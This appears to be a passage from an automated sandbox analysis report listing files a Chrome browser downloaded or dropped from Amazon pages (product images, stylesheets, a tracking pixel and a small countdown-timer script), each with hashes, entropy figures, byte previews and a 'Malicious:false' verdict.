                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........:.........................................................................b.............z...v.=.l9.Pi.h]..o.:F......b.....@.....}C-. .}........X......L....".X(-\X......>u../....~oX....;...d.....#.Zb7>=.~.p......'........D../..F.........h..3..._..Z..#.R...\,|v.......k...z.s ...^.nf..efd..[..g....i..@........5..w.....7H.,.SF..d.`................P.............................!%E..145DUe.$&06AQVqu..'@FGa.........Pf...."gtv..........?......aEYT.)R..%.....o7.%..6I.V.x........F.(.G...8....A...B6Y...ezr..+.B..a...z...iW.......Z9?.hV|bINa....%d<...K-.d....r...yF.mLfC.H.Cm}.|z...0..m....p..7Z4...).....I.%TH...P.B..%.\G..:8.R..GV..,E......j..&j.....$.\.9<.9..Q.....b.<.....)./ZN..p..<.m.O....2.._.O..!O.z>..%..L..6.i2......P....U.#.|...6...2.1...c..]..!:.U....,.Ek%...h.*..$.Nq{(.h.`$.t.w..0..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):17543
                                                                                                                                                                                                                                                                Entropy (8bit):7.949246067715574
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:JAY4t29xKLSyL8wcj4+vt7/G2bgnc+Ax5mqlXFgquj9MF0KVBGk:KY4tKu7L8wcEet7/j8RQ1gqmY0il
                                                                                                                                                                                                                                                                MD5:40A8B803B2A97DFBF6BC7474E69E0606
                                                                                                                                                                                                                                                                SHA1:2FE3407465A0E85D17FFAB673606514BF5ECD6B6
                                                                                                                                                                                                                                                                SHA-256:2C240DF97D0DDDC2468777675A4D4EFDC35E8B5DF2C88E2AE5409CA9C8E1C89F
                                                                                                                                                                                                                                                                SHA-512:31B9C7E7AD7C10D88028A780971319105469C71AF572AE07CDD2023A65FC14CFF7E7460D1B1FCD6E70FF128EEDE1A1EBDB660F73B110A5478092514E5363E524
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71F4euJMeiL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5........................................................................6...c...+....V....l..[.......lI...l)....E.;.^..=....d.k}..&*a..'%DF..{?O8..X.7.<o............roYp.N5~k.;g.0k.H.0..M....1.a...b.O.....m.52cly..6.:..m{.=6.z.#l.F.Q....i..N......Ky..G.@........~..[K..y*d..=.y{..:sSmz..1..r..f...%8.....Q.......QY.xv....r."..H......3............p.s. ..E/.bJX...7.a.#......+w.zuL.[..{/:..f.Xv.6....S\..3...T...}."(...............A.....,C....._BB.z..("t|..I.%......7|F.ozI...yN4;zR'J{.*....s..~..\.'SM.lO0{.>MyG..rw..).<u.8n........:.W9..N/.0..1.0.5.Eq...j...Ap.kK&.5....x.C1I&..r...+?..`.dt.c.-....2.N@T."UD3S.@..@.............s.D....~ue../.|./.a.y.7C.S^n...9..V...1..<.S..W.m.~u....q.....=.....S._....L47....J>.....F1{ ...........n.sJ....5..........S.n:v#uC.n1;r..=./O
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6246), with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6246
                                                                                                                                                                                                                                                                Entropy (8bit):4.955905351879632
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:RtT2uW9WUyn55m28wK1Jwjy78NrGfcRTeYHrYvyDN/Pih2ls8tuYZ3:P6YDRNM4iYHrYvWN3ihMs8d
                                                                                                                                                                                                                                                                MD5:7BCB6C2622F982D0FECC3B3E45541EC3
                                                                                                                                                                                                                                                                SHA1:2A5833FCA90B81168809F0BD2F0E1C067A35A6AD
                                                                                                                                                                                                                                                                SHA-256:C29412F5517BC556A5A4EA946B7AEBAD1DDC1D4B442377327A7E9C45BE3E3274
                                                                                                                                                                                                                                                                SHA-512:B3281E469BBBF05C365004F4280FCA4A36189540BC2783E7CBEDC7741E1E13C01E13A7806873A021FCA4D06C7AC3813C6A95FFB204CC5CACF8FAE21C0CE7ED8E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/21RZgaOpsqL.css?AUIClients/QuantitySelectorAssets
                                                                                                                                                                                                                                                                Preview:.qs-widget-container{font-family:"Amazon Ember",Arial,sans-serif!important;line-height:19px!important}.qs-widget-checkbox-hidden:active+.qs-widget-container{visibility:hidden}.qs-widget-checkbox-hidden:active+.qs-widget-container>.qs-widget-spinner{visibility:visible}.qs-widget-hidden{visibility:hidden}.qs-widget-visible{visibility:visible}.qs-widget-disable{opacity:.33;overflow:hidden!important}.qs-widget-spinner{position:absolute}.qs-widget-table{border-collapse:collapse;table-layout:auto;margin:0!important;border:0;width:auto}.qs-widget-footer-container{border:0;padding:0;text-align:left}.qs-widget-price{font-weight:700}.qs-widget-dropdown-container{z-index:16777271}.dropdown-ux-refresh.qs-widget-quantity-container{padding:12px;border:1px #d5d9d9 solid;border-radius:4px 4px 0 0;background-color:#fff}.dropdown-ux-refresh.qs-widget-summary-container{padding:8px 12px 12px;border:1px #d5d9d9 solid;border-top:0;border-radius:0 0 4px 4px;background-color:#f0f2f2}.dropdown-ux-refresh .qs-w
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/rd/uedata?ld&v=0.294992.0&id=JZJKZTDKNV2CKC82BW2M&sw=1280&sh=1024&vw=1263&vh=907&m=1&sc=JZJKZTDKNV2CKC82BW2M&ue=11&bb=1962&ns=1997&cf=2473&ne=2508&af=2483&fn=2483&be=2682&fp=2172&fcp=2172&pc=16600&tc=-1435&na_=-1435&ul_=-1723469044322&_ul=-1723469044322&rd_=-1723469044322&_rd=-1723469044322&fe_=-1431&lk_=-1373&_lk=-1373&co_=-1373&_co=-630&sc_=-1359&rq_=-629&rs_=-78&_rs=242&dl_=-23&di_=2750&de_=2750&_de=2750&_dc=16599&ld_=16599&_ld=-1723469044322&ntd=-1&ty=0&rc=0&hob=1&hoe=12&ld=16601&t=1723469060923&ctb=1&rt=cf:147-4-5-137-2-10-1_af:148-4-5-138-2-10-1_ld:260-9-7-234-7-18-1&pty=Gateway&spty=desktop&pti=desktop&tid=JZJKZTDKNV2CKC82BW2M&aftb=1&lob=1
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5979
                                                                                                                                                                                                                                                                Entropy (8bit):7.9259200143438635
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TtRhwPO/wdxiSNEU8JwBTVrbFXtDBNnlpHp0jp4CVB1FY9mUAx1REyKKs:5Ry2/ShTVrbFXtFNnl/tC/1qmDx/YKs
                                                                                                                                                                                                                                                                MD5:45EE8A1E875B3EA7124924E4552F12F5
                                                                                                                                                                                                                                                                SHA1:63E0756D8EB014E291543C749856B90A0FA33DCC
                                                                                                                                                                                                                                                                SHA-256:7E887C77E1177AF91DE9E3510F4065ED7AE5160CEB962F3EFAC8EA4FC012E01A
                                                                                                                                                                                                                                                                SHA-512:A403D9559CE9124F45B806295171D4CBB43BBD2B328EA572CD483CA8597FDCDC6BC198EB2646E97CECF9E9AB0AE110BCC71BB3A6C391CDE86CE4D6421BEC8586
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1..AQ."RTa...#24Cqs.......3r...5BUt..$....6bcd.................................................!1..Aq."2Q.#Ba................?......e@9.q.*^...k.P...'|1.-..F|......(.....L...@...y<.GiQ..Y..).B.-..t*.N.....Og.d.d.2..F.{U.._.........x...aEbo...EmQS..~.....7..-. .(..]E+..zW....1.....c.&...*%V....2.EQF...ke........*.....@.^........=,..RR.._O..>..2.&....EO'..Pg<#.\.._......%.k)j6,6....Zu..S._.....{k...i.o.[...I%Tq...8fw...$`c.j;.j/..Gl..Y.{..!..@.!.!.@.B...B.....\...........T......P..N$j.Q.p{>u.P.%.J....Z:.@\.IK.@.......T.W......N.._..9...X.'......j....5....z^....Ncw'I......0.o...,O......uL....'SPX.43UT. .........]u...{7B..].....I.*o+.>....'......s..]555..n5.]e.X.w5.~y..+-..`..K0...I#.`..1....!Q.5.......uD.ak.3...Q#%Y
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12378
                                                                                                                                                                                                                                                                Entropy (8bit):7.906298624082549
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:KLdPr+x6wMESGehV6E12cqd6wpC6HTd6ba6VJ5C/g4ZDsgHSRFdyfPCWn:KLvwFSGykE12gwP6u6H0/glcSNyfKWn
                                                                                                                                                                                                                                                                MD5:635C1F9BCA0B6682A9629D23A2499BEC
                                                                                                                                                                                                                                                                SHA1:28FED44220A01C59E5F980E893CED147EE52AEFF
                                                                                                                                                                                                                                                                SHA-256:586888B085A99F4997B188A26E1E8B0D5687CB3B819626E7FABC7F31CB73AF2D
                                                                                                                                                                                                                                                                SHA-512:F386C41CB94700D83715E16E09FF90D2FE2CBA95189C0278F59B00F7A19C6188FF014B7B0547D94DC390DFC80ACC1F81CD48F2E7CF534B75E2ED8BCA838F56C3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/31+4pNVeyCL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................,..........................................G ..............[...i.0..S.K...Q....O.W.v.9..Bc.. .....:.;..t\v..m..v2.........Z....z..?E~id#...W..........?!fpl..%...U.9b.<.5...76.?y.=.)....7r.E...k..."9.]...t.+F.g.1v......W..W2.3./~....X...........1...`.:1..6d8.6..LY{..~o....2.E......)"#.hHa.".......0:....$R..o=d{.....0.......1.,a.sX,.e..G.?B|6}1..GP.....,U...E...K....)a#.h.b.......0Z..FzH.*...].wT..g@.........b.-..f.c-....xk.,....DQI..2BG...L.2..C,U..@C.q.QU.vwvq..v.F3.QQU..e;.....@............O7..h.Z...C\UDU.Q.q.C$$QI...3...RDQ...pM..RDS.q.Z]ZF.R.u..UG.WV.FO....g..:........>c.q...7..kqiQE\E....RDG...C,$x\../.".d............n......q.x+...2......f.........7.8~k..............:.(.H......g......)a....(...9#.....&...q.y.%.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3410
                                                                                                                                                                                                                                                                Entropy (8bit):7.619193594074733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0woVXYqDnuE31/pQ0buynj4C83HGA1ym07lfZaQm7ErWGqRCDuGB5z:TboVdy4BQ1eJ83B1ym8fNdrWBRCayz
                                                                                                                                                                                                                                                                MD5:7E787FAF1EB722AD0DA17F9A6F33A0B5
                                                                                                                                                                                                                                                                SHA1:E1E7576526CA7B6E2F6C1E652322E17633055192
                                                                                                                                                                                                                                                                SHA-256:0B0DEC14A9777B5377EB99C6B2B4CDF3B15DEFCE1267513F5B1F505AFCE2F936
                                                                                                                                                                                                                                                                SHA-512:777230B55EE93D0D3A8A14FF038F5074488D8ED7D6A2FFB8141602668409C3D273D51DF50B453BF2882CB50609F6A65883F370F581EAA2A583B775646091E8E9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/31Id2i6D-rL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`.......................................u...F!'Q.I.b.u...F!'Q.I.b......!.7.Q.7/..tsm...^e......M..C.M".|..y...a..5..g.j}..t..2.T].....1.\.?....p...7..X.........h[U...`..^U.\.L...=Zu,4.|.k.<I..R......9.@..7...J/..2....X..^..v.;n|.3...g........_i.M...Y...*......w.zG-.?#.._Iy....Jt..r..h..E....9.k`.c.7.it...m...g..B........7U.J....*..k+!....:.............)7.hT.5.y.D.W-..<.......&F..`.'.5....m...L.....1Q#...O.1..c1..v=3#..t...................................................*.............................014.. !A2p#............X.qX..3.l.6.sl.6.sl.6.sl.6.sl.6.sl.6.sl.6.sl.6.a.U.:.C.KW.Wo..D%.?.PR).S.]9..d....@m..M.F.#G....**.:..NX.b.*..>...s9.[.....:.....%.lX....M._.....T._...1.....U.^!....#.....}}.u.ovT...b9.{d.{$../..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 154x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8704
                                                                                                                                                                                                                                                                Entropy (8bit):7.958492553454244
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:TsG8DL94cg11OHOHadPCqWVt0OWcxaLWznnee9tCdKfGdNs56+ZE:TsG6AV6FMeOVx3n99tCwfGdA6t
                                                                                                                                                                                                                                                                MD5:3891A8405D954749DB4E5D5E7E5D72AD
                                                                                                                                                                                                                                                                SHA1:FC6A597C3254A2F8465BBC73E6D0128F244CAC41
                                                                                                                                                                                                                                                                SHA-256:7F4DBC79169686970506C0D506C42F12B6E59F192E0EEF7FC4DC11C5DC5CDEEC
                                                                                                                                                                                                                                                                SHA-512:5F7124B7FAC32E5F15DDF1FA52083B56095F1372FE082A8E14386711FC1F9C0DE0D76942A240B9A6DA108D75C086EB201D94A5ACE4FAE55C75E62A49013AFEEC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1.AQ.."2Ra...Bq...#br......3d...$DS.....................................................!A.1Q.."2B.aq.......3C.r............?..(..".(....(B*..q...--.<. ..9....9.{.EZ.F...($.+..~)..Q.)}...h,T..O.....i....G.{....W~.nU=..\.Gvz..c...u..8..x5.x.oe~F.,}V.....|..r.o....kw...1..a.F....E...t.q...h....8zG...{..a.....%O. ./..pTN...U.>...H?:.+..6@z..fd..e>...jP..J<....]........wB..}.i.c...+d.^.90.g.ki...H..L....\-..U.R...o.E....QE.E.QB.EW....)...G..3.H.2.|$....{..{.A..U.....A?.Qb.m#..U(.V.?....D.....5}SRe.H...'?5...W<...X.Q...;..B...k..+G..-..\Z#..U....n...i3$.gj......<...?... #..H....U..Y.nF.w~'%p..X<*27eR4v;z..(+ZJ.)..5.:._...n...J....6..;;..n........6..GP...hm.jSMhe.....^.]w..y..Wn..1hH..~...^..d.......5....S...@z*...Vz...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 149x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6247
                                                                                                                                                                                                                                                                Entropy (8bit):7.931075673008785
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TpRE1kdTwKNDKsA1fJBO4L4DDzIADaOrPHWu+qhr6TBkE4UG4NvilU273:MudtzA9DVMDDz/aOTHt6T3hNaJ73
                                                                                                                                                                                                                                                                MD5:566261D0BB02E70575E03735FB6CDA05
                                                                                                                                                                                                                                                                SHA1:94AAC223461646A349787FF57C2728E120D62B86
                                                                                                                                                                                                                                                                SHA-256:11122111563CFC2812D9471DA93BF505B71168E5AB7DDF14DECEE0E3808B758F
                                                                                                                                                                                                                                                                SHA-512:A5C0A1E6FC3D6BFB849203170CA21EC2AC6FD471ACEFA3F38ED12D7BE6480BD6939749105D1186A143B60A861BE628295F97DB0549EA56D7F8709795D4CEB016
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61hmx6dffrL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..A.."Qaq..6u.#2BRSrst.......$3...&45bc.....................................................!1..AQa..............?...o.ox.H\.Xm.R........E}:....O..?WN|.9.....k.2)`. ..-....Q.$nm.........$.w..<4.@r`....5.w..]cN. ..!.....2z..@8.......e.y.............>...7r...,.p..._......t.dI....0..s..6..U.i.....?..o.r1^.8......0;m@>........(..F...Sv:......A.....9N.%>.av.H..w...FH?...g<.q..+@.....R.\H..m..9.....R.1.Lxx...A.5..e|....(.....'."...R...g..(..!.c..=Z.qll...>....>..r.9...xl.uV.G..c...m..Z.u.c..h1..0.y`.r.'-Z....(.+x.T1.tH.O.]..t#..4.Pf?l. 2.....ciZ.Ky../.f..Zg`0s.=....R.!...........k.Mw.X....2....X.2_.d....L..t....a.-^.V(#.c.*2v{..%G}.q...1.6]....P8 .$..p.'...V..s....k.h.Eq...*...Z..1.....+?....H_R.9.H...<P...xn..V..Z..E.....k.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (510)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):902
                                                                                                                                                                                                                                                                Entropy (8bit):5.205086466616489
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:2WZ/P3eAiarnyCFTjd6odi0Gx9g934jcASoN:RzryitFi0Gtn
                                                                                                                                                                                                                                                                MD5:B33E102C16865CE9C5CBA2438083AE0A
                                                                                                                                                                                                                                                                SHA1:9CAC174A6773DE9D3E22D1CA5423ACB03B497656
                                                                                                                                                                                                                                                                SHA-256:A473A5AAC16EDC54CA599F6AF7D8A92BC6148748BA61AD9F265377194E419FF0
                                                                                                                                                                                                                                                                SHA-512:DFB77B5CB9DA20A84219D68EBFC8CC3112D506AF8D8BC2839FFA846360053560CC054737FEF7CE2F5D07EA279254A1A7761A6598934345DB8A377FBAABCDAA3D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01aXEwSGkvL.js?AUIClients/AmazonAPIRichContentBuzzAssets
                                                                                                                                                                                                                                                                Preview:(function(b){var d=window.AmazonUIPageJS||window.P,e=d._namespace||d.attributeErrors,a=e?e("AmazonAPIRichContentBuzzAssets",""):d;a.guardFatal?a.guardFatal(b)(a,window):a.execute(function(){b(a,window)})})(function(b,d,e){b.when("jQuery").register("count-down-controller",function(a){return{countDown:function(b){var c=a(b),d=new Date(Date.UTC(c.data("year"),c.data("month")-1,c.data("day"),c.data("hour"),c.data("minute"),c.data("second"),0)),e=null;e=setInterval(function(){var a=d-Date.now(),b=Math.floor(a/.1E3);if(0>b)c.text("00:00"),clearInterval(e);else{a=Math.floor(b/3600%24);var f=Math.floor(b%60);b=("0"+Math.floor(b/60%60)).slice(-2);f=("0"+f).slice(-2);a=0<a?[a,b,f].join(":"):[b,f].join(":");c.text(a)}},1E3)}}});b.when("A","count-down-controller","ready").execute(function(a,b){var c=document.querySelectorAll(".amazon-api-rc-count-down-timer");a.each(c,function(a){b.countDown(a)})})});
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.848287570294709
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:UglPKcxAd2UD3eHvFWmFIwVa:hlfcD3eP5FVo
                                                                                                                                                                                                                                                                MD5:B4D14A5A7DED2B7E8B61FFDF0D27C6AC
                                                                                                                                                                                                                                                                SHA1:76129547B66AFA304FAE22701B3353F82AE027AB
                                                                                                                                                                                                                                                                SHA-256:2997E47CEA9CE1DC60305874F04D973D8A1C85E2A64EF235D1078B2587EB6984
                                                                                                                                                                                                                                                                SHA-512:DFC427EE8AE3F810D111120C54E866AACFD40E26BF92D4037307AE0FC1A507F5161CCBA61D995A0CEC7E892BEDD2A179E6FD5E7F25B12FD3A5A86FB5CB409110
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01hxt8miXyL.css?AUIClients/SmxCartAssets
                                                                                                                                                                                                                                                                Preview:#priceCallOutDisplayText .currencyINR{background-position:-32px -333px}
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3030
                                                                                                                                                                                                                                                                Entropy (8bit):7.8440249204193355
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6gQeKWD+tqlOdqhiK2jMlBMPZgTiEU93kpMPWGYVppMVX+E3ofOffNYcUYtN:ToQiqql7L2jxWTiEU95WGYW1j3hNYcvn
                                                                                                                                                                                                                                                                MD5:DAAA6DC15D970C9853EE63CD843E84F6
                                                                                                                                                                                                                                                                SHA1:4832EF5D60E7F15796FCA8956E7C08B676BE47E8
                                                                                                                                                                                                                                                                SHA-256:E7350D94E6050847DC6D4A3CFAD7B161751D2E592D68ED72CBBC2088FE0532D6
                                                                                                                                                                                                                                                                SHA-512:5E94312EC7B301D0B7846B9E47A9562C1100864AD402861933F89512D0AF5FB2174A300AC5AD069EB2D15C00F6A07DB140688BA5EB661EFE7D93B0D8E402FB19
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1...Q"2Aq....#Ba..CRTr....$%d......................................................1..!Q."aq..AS..............?......H&""....z....D.."2I.DE..2........rBi..)Rj..fIzz.I?.....*L........U(=?Yb..e8..I+*".`.@....P.(...`,..t..K.~~r.D..MRH.$M.Y.dI..@...&&..=v.%....Fp.V....r34.......KG.Z..1.>..[[.t.g(.18.~..H.....x......D.......>.../..;DN6{.....Y..'P.=.V.[.aAi..).frx.8...WA.J....t.....F.r.7...Y=...K!Fd`C/*F...........?.cG+.36I..?....>.V./..`..._..=..`B.fl..&.g.Ks.t>.....o.}...+R4...G.).k....(T..S.......O...2.E.6.K..W...."".....f.-....OS..P.......v.8.U.sE...#....R8a...QyF..qV........*.....3gL..S.g....t9k.u.....'..3..A..........-xl..|0&..\...'..:}J........g....7.g......;Kc.*H..c-..nZ..v.}...S..r..7Tk...KtSO^Y..K..........z.Q@U4.#6.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 440 x 300, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2016
                                                                                                                                                                                                                                                                Entropy (8bit):7.538344195002318
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:UZMU7HaDUllBllllllll35llllQnxuxplTDOII84llllllll8lllllllllNHhp6b:aMIHaDUllBllllllllpllllQnxOpJO/R
                                                                                                                                                                                                                                                                MD5:764A788FCF655624F21D3865A556F75B
                                                                                                                                                                                                                                                                SHA1:B4BF5DAFCF2A1C32B91611B78E3AD1EE23B40AED
                                                                                                                                                                                                                                                                SHA-256:6BAC2D0C2206A7F1C4009811A5B3ABB1A78DD4CAF6B5FD6BADE051F1ADADAC1E
                                                                                                                                                                                                                                                                SHA-512:73DE297DE7995E08BA111D77A170CCC8C506AF829F873AE57DBF27CE53B5F96E3BA2F2D0D1C7CE1F2C5C4F7CEBB80D5EB9280E4DC90A673AA8516B76A17CF817
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.......,.......V....5PLTE............$R......................................................>Qk........3Ig....%S.*Vcl{.(T.........Yew.......-W...0Y.:_...$>a..y}....FWo....7]sx.....3Zfn|.........ou.9Mi.........(Ab........akzVcv]hy+Dd...kr~...IYp...-EeATm........M]r....../Ge........R`t............................%...fIDATx...{[.V..q..!c[.N;..B..E.R..r..E..*..]..GX...`.Jb../..M4?.sr..%"""""""""""""""""""""""""""""""""".......^.......+............p....p....p....p....pf..z..!..L=.?.7..y....-..T..?...p....p....p....p....p....p....p....p....p....p..7#....Q......'..o..^.\A.~_.....V}Z..i./p.q....p....p....p....p....p....p....y..p.......3...8.T29ar.....8....8....8....8...2...3"...8....8....8....8....8....8....8....8....8....8.......8....8....8....8....8.....'.+...g..b91...<.....$..H......r`....~lG..X......9.. ..9.k....-....l.L...D>..;s.;..p..iJ.L..*.\3.6.e<..Qu.~Z......\a...*...g.*..hE.!).S..e.e.s]e?a..*.......t>..l.T.W.....?..x;...G..<
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 141x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6674
                                                                                                                                                                                                                                                                Entropy (8bit):7.929692590722878
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:AelUVXezZbzo+bE9UJFS5U/cXgBAHnv3S:TlUYnbUeFKmcOAPi
                                                                                                                                                                                                                                                                MD5:9B5E321EE9A2ABD6A4F6F5A994A2D6F5
